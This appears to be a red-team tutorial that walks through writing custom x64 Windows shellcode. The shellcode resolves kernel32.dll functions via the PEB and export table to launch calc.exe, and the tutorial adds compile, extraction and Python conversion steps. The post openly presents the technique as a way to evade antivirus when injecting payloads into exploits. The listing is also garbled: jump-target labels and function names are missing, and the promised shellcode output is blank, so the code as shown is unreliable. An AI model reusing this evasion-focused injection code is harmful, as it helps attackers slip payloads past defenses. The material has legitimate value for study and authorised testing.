When developing exploits, particularly for red teaming or research, one common task is to inject potentially malicious shellcode. However, using tools like msfvenom
to generate shellcode often results in payloads quickly flagged by antivirus software. To overcome this, we’ll write our own custom 64-bit shellcode that dynamically resolves function addresses in kernel32.dll
and opens calc.exe
. This process not only avoids detection but also gives you more control over the shellcode’s behavior.
In this write up, we’ll develop the shellcode in assembly, compile it, and later extract the raw shellcode bytes for use in our exploits.
Shellcode should be position-independent, meaning it can execute correctly regardless of where in memory it is placed. Additionally, it should dynamically resolve necessary function addresses at runtime, as hardcoding addresses may be unreliable across different systems. This helps to ensure that the shellcode is both flexible and hopefully stealthier.
We aim to create shellcode that:
- Dynamically resolves the base address of
. - Locates the address of
using the Export Address Table. - Calls
to opencalc.exe
. - Cleans up by calling
to exit gracefully.
The following material for this write up was performed with the Mandiant Offensive VM (CommandoVM) using the developer installation profile.
To compile and run this assembly code, the following was used:
- Microsoft Visual Studio: Specifically, the
tool provided by Visual Studio is required to link the assembled object file into an executable. - NASM (Netwide Assembler): A popular assembler used for writing assembly code.
- Python: For converting the binary shellcode into a format that can be included in a C program.
Writing the Assembly Code
Here is the assembly code that dynamically resolves kernel32.dll
and opens calc.exe
. It includes the data and code in the .text
section so that the shellcode can be extracted entirely.
section .text
kernel32_dll db 'KERNEL32.DLL', 0 ; String for the kernel32.dll library
loadlib_func db 'LoadLibraryA', 0 ; String for LoadLibraryA function
winexec_func db 'WinExec', 0 ; String for WinExec function
calc_str db 'calc.exe', 0 ; Command to open calc.exe
exitproc_func db 'ExitProcess', 0 ; String for ExitProcess function
global _start
sub rsp, 28h ; Reserve stack space for function calls (align stack)
; 1. Resolve LoadLibraryA to dynamically load DLLs if needed
lea rdx, [rel loadlib_func] ; Load the address of the LoadLibraryA string into rdx
lea rcx, [rel kernel32_dll] ; Load the address of the kernel32.dll string into rcx
call lookup_api ; Call lookup_api to resolve the address of LoadLibraryA
mov r15, rax ; Save the address of LoadLibraryA in r15 for later use
; 2. Load kernel32.dll (it's already loaded, but this demonstrates the mechanism)
lea rcx, [rel kernel32_dll] ; Load the address of the kernel32.dll string into rcx
call rax ; Call LoadLibraryA (stored in rax) to load kernel32.dll
; 3. Resolve the address of WinExec
lea rdx, [rel winexec_func] ; Load the address of the WinExec string into rdx
lea rcx, [rel kernel32_dll] ; Load the address of the kernel32.dll string into rcx
call lookup_api ; Call lookup_api to resolve the address of WinExec
; 4. Call WinExec to open calc.exe
lea rcx, [rel calc_str] ; Load the address of the calc.exe string into rcx
mov rdx, 1 ; Set uCmdShow = SW_SHOWNORMAL (show the window)
call rax ; Call WinExec with the parameters set above
; 5. Resolve the address of ExitProcess
lea rdx, [rel exitproc_func] ; Load the address of the ExitProcess string into rdx
lea rcx, [rel kernel32_dll] ; Load the address of the kernel32.dll string into rcx
call lookup_api ; Call lookup_api to resolve the address of ExitProcess
xor rcx, rcx ; Set the exit code to 0 (normal exit)
call rax ; Call ExitProcess to terminate the process
; lookup_api: Look up the address of a function within a DLL's export table
; rcx=DLL name string, rdx=function name string
; returns the function's address in rax
sub rsp, 28h ; Align the stack
; Access the PEB (Process Environment Block) to find the base address of kernel32.dll
mov r8, gs:[60h] ; Load the PEB base address into r8
mov r8, [r8+18h] ; Follow the pointer to the PEB_LDR_DATA structure
lea r12, [r8+10h] ; Get the address of the InLoadOrderModuleList list head
mov r8, [r12] ; Move to the first entry in the InLoadOrderModuleList list
cld ; Clear the direction flag for string operations
for_each_dll: ; Loop through the list of loaded modules
mov rdi, [r8+60h] ; Get the UNICODE_STRING.Buffer pointer (module name) in rdi
mov rsi, rcx ; Load the DLL name string we're looking for into rsi
lodsb ; Load a byte from rsi into al (pointed to by rsi)
test al, al ; Test if we've reached the end of the DLL name string
jz found_dll ; If so, we've found the matching DLL
mov ah, [rdi] ; Load a byte from the current module name into ah
cmp ah, 61h ; Compare with lowercase 'a'
jl uppercase ; If less, it's uppercase already
sub ah, 20h ; Convert lowercase to uppercase
cmp ah, al ; Compare the characters
jne wrong_dll ; If they don't match, this isn't the right DLL
inc rdi ; Move to the next character in the module name
inc rdi ; UNICODE_STRING is wide (2 bytes per character)
jmp compare_dll ; Continue comparing the DLL name
mov r8, [r8] ; Move to the next LDR_DATA_TABLE_ENTRY (next module)
cmp r8, r12 ; Compare to see if we've looped back to the start
jne for_each_dll ; If not, keep searching
xor rax, rax ; If DLL not found, return 0 in rax
jmp done
mov rbx, [r8+30h] ; Get the DLL base address (points to DOS "MZ" header)
mov r9d, [rbx+3Ch] ; Get the e_lfanew field from the DOS header (PE header offset)
add r9, rbx ; r9 now points to the PE header
add r9, 88h ; Move to the Export Directory RVA in the optional header
mov r13d, [r9] ; Get the virtual address of the Export Directory
test r13, r13 ; Test if the DLL has an export table
jz done ; If not, return 0 in rax
lea r8, [rbx+r13] ; r8 now points to the Export Directory
mov r14d, [r9+4] ; Get the size of the Export Directory
add r14, r13 ; Calculate the end of the Export Directory
mov ecx, [r8+18h] ; Get the number of names in the export table
mov r10d, [r8+20h] ; Get the AddressOfNames array RVA
add r10, rbx ; r10 now points to the AddressOfNames array
dec ecx ; Decrement ecx to point to the last element
lea r9, [r10 + 4*rcx] ; Load the RVA of the function name into r9
mov edi, [r9] ; Get the function name RVA
add rdi, rbx ; rdi now points to the function name string in memory
mov rsi, rdx ; Load the function name string we're looking for into rsi
cmpsb ; Compare the strings byte by byte
jne wrong_func ; If they don't match, try the next function
mov al, [rsi] ; Load the current character of our function string
test al, al ; Test if we've reached the end of the string
jz found_func ; If so, we've found the matching function
jmp compare_func ; Continue comparing the function name
loop for_each_func ; Try the next function in the export table
xor rax, rax ; If function not found, return 0 in rax
jmp done
mov r9d, [r8+24h] ; Get the AddressOfNameOrdinals array RVA
add r9, rbx ; r9 now points to the AddressOfNameOrdinals array
mov cx, [r9+2*rcx] ; Get the function's ordinal value
mov r9d, [r8+1Ch] ; Get the AddressOfFunctions array RVA
add r9, rbx ; r9 now points to the AddressOfFunctions array
mov eax, [r9+rcx*4] ; Get the function's address RVA using the ordinal
add rax, rbx ; Add the DLL base address to the RVA to get the function's address
add rsp, 28h ; Restore the stack
ret ; Return the function's address in rax
Compilation Commands
Once you have written the assembly code in a file (e.g. shellcode.asm
), you can compile and link it using the following commands:
nasm -f win64 shellcode.asm -o shellcode.o
link /SUBSYSTEM:CONSOLE /MACHINE:X64 /ENTRY:_start shellcode.o /OUT:shellcode.exe
These commands will produce an executable (shellcode.exe
) that, when run, will open calc.exe
Extracting the Shellcode
To extract the raw shellcode from the compiled executable, we can use the following technique. First, run this command:
dumpbin /headers shellcode.exe
You will see an output that includes a section similar to this:
.text name
14C virtual size
1000 virtual address (0000000140001000 to 000000014000114B)
200 size of raw data
200 file pointer to raw data (00000200 to 000003FF)
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
60000020 flags
Execute Read
Converting these numbers to decimal, this means we need to extract 332 (0x14C) bytes beginning at offset 512 (0x200) in the file. You can extract this with the following command:
dd if=shellcode.exe of=shellcode.bin bs=1 count=332 skip=512
Now we have a file shellcode.bin
containing our shellcode. Next, we can convert it to a hexadecimal format that can be easily copied into a C program. Here’s a Python script to do that:
import sys
def bin_to_shellcode(bin_file_path):
with open(bin_file_path, "rb") as bin_file:
binary_data = bin_file.read()
# Convert each byte to a "\x" formatted string
shellcode = '\\x' + '\\x'.join(f'{byte:02x}' for byte in binary_data)
# Split the shellcode into lines of maximum 16 bytes (32 characters for hex)
max_bytes_per_line = 16
lines = [shellcode[i:i+max_bytes_per_line*4] for i in range(0, len(shellcode), max_bytes_per_line*4)]
# Format it into a C array
formatted_shellcode = 'unsigned char shellcode[] = \n"' + '"\n"'.join(lines) + '";'
return formatted_shellcode
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python script_name.py ")
bin_file_path = sys.argv[1]
shellcode = bin_to_shellcode(bin_file_path)
Running the python script on shellcode.bin:
python convert.py shellcode.bin
Running this script on shellcode.bin
will output shellcode like the following:
unsigned char shellcode[] =
This shellcode can now be used in your C programs or further tested in your exploits.
References and Resources
- mandiant/commando-vm: Complete Mandiant Offensive VM (Commando VM), a fully customizable Windows-based pentesting virtual machine distribution. commandovm@mandiant.com (github.com)
- Finding Kernel32 Base and Function Addresses in Shellcode | Red Team Notes (ired.team)
- Windows x64 Shellcode – Topher Timzen –
- x64win-DynamicNoNull-WinExec-PopCalc-Shellcode/win-x64-DynamicKernelWinExecCalc.asm at main · boku7/x64win-DynamicNoNull-WinExec-PopCalc-Shellcode (github.com)
- Windows x64 Shellcode – McDermott Cybersecurity (wordpress.com)